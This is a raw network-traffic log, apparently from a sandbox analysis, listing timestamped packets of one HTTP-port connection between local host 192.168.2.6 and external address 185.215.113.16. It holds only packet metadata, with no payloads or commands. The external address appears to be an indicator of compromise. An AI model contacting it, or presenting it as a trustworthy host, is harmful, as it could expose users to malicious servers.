Oct 29, 2024 06:59:25.963304043 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963306904 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963346958 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963357925 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963360071 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963371992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963382959 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963397980 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963438034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963443041 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963449001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963460922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963471889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963485003 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963489056 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963512897 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963514090 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963526964 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963546038 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963568926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.963596106 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.963596106 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998092890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998136044 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998176098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998204947 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998251915 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998265028 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998276949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998276949 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998315096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998318911 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998351097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998363018 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998378992 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998393059 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998409986 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998454094 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998466015 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998496056 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998507023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998517990 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998526096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998538017 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998544931 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998601913 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998614073 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998635054 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998635054 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998646021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998671055 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998697996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998781919 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998804092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998847961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998859882 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998872042 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998872042 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998895884 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998898983 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998913050 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998923063 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.998924017 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.998954058 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999092102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999104023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999115944 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999140024 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999142885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999155998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999167919 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999171019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999195099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999197960 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999207020 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999217987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999227047 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999238014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999248981 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999258041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999270916 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999284029 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999286890 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999286890 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999362946 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999381065 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999393940 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999397039 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999404907 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999418974 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999423027 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999429941 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999442101 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999445915 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999455929 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999455929 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999485970 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999578953 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999619961 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999630928 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999675989 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999701023 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999711990 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999727964 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999761105 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999782085 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999788046 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999794960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999805927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999818087 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999844074 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999888897 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999901056 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999913931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:25.999932051 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:25.999989033 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000000954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000003099 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000014067 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000025988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000051022 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000098944 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000101089 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000111103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000122070 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000155926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000185013 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000217915 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000235081 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000242949 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000247955 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000262022 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000273943 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000336885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000348091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000360012 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000369072 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000375032 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000380993 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000459909 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000472069 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000480890 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000488043 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000509977 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000523090 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000533104 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000535965 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000546932 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000560999 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000575066 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000583887 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000588894 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000601053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.000612974 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.000874996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.004384041 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.004405975 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.004416943 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.004431009 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.004507065 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.043404102 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.043507099 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.043554068 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.082118988 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082192898 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082268000 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082282066 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082298040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082315922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082334042 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.082334042 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.082392931 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082416058 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082417965 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.082432985 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082448006 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082462072 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.082464933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082480907 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082492113 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.082495928 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082510948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082525015 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.082535028 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082550049 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082561016 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.082566023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.082593918 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.127306938 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.347970963 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.391309977 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.615741014 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.615801096 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.767309904 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902383089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902416945 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902451038 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902483940 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902494907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902518034 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902528048 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902551889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902585030 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902618885 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902633905 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902652025 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902657986 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902686119 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902719021 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902729034 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902770996 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902805090 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902813911 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902838945 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902872086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902880907 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902924061 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902956963 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.902976036 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.902992010 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903024912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903048992 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903075933 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903110027 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903125048 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903151035 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903184891 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903191090 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903233051 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903281927 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903316975 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903332949 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903366089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903398991 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903428078 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903434992 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903434992 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903469086 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903501987 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903534889 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903547049 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903575897 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903584003 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903618097 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903650999 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903685093 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903688908 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903718948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903753996 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903762102 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903789043 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903789997 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903824091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903857946 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903867960 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.903892040 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.903929949 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904120922 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904171944 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904205084 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904217005 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904257059 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904289007 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904325008 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904334068 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904357910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904366016 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904395103 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904427052 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904448986 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904457092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904491901 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904509068 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904525042 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904557943 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904567003 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904592037 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904625893 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904658079 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904661894 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904691935 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904725075 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904736996 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904758930 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904789925 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904798985 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904834986 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904843092 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904876947 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904908895 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904922962 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904943943 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.904984951 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.904993057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905026913 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905060053 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905088902 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905111074 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905143023 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905165911 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905175924 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905211926 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905220032 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905246019 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905278921 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905288935 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905313969 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905345917 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905373096 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905379057 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905412912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905421019 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905447960 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905479908 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905489922 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905514002 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905551910 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905587912 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905597925 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905620098 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905653954 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905662060 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905689001 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905694008 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905723095 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905755997 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905766964 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905790091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905827999 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905832052 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905862093 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905895948 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905905962 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.905929089 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.905972958 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906145096 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906177998 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906212091 CET	80	49769	185.215.113.16	192.168.2.6
Oct 29, 2024 06:59:26.906219959 CET	49769	80	192.168.2.6	185.215.113.16
Oct 29, 2024 06:59:26.906245947 CET	80	49769	185.215.113.16	192.168.2.6
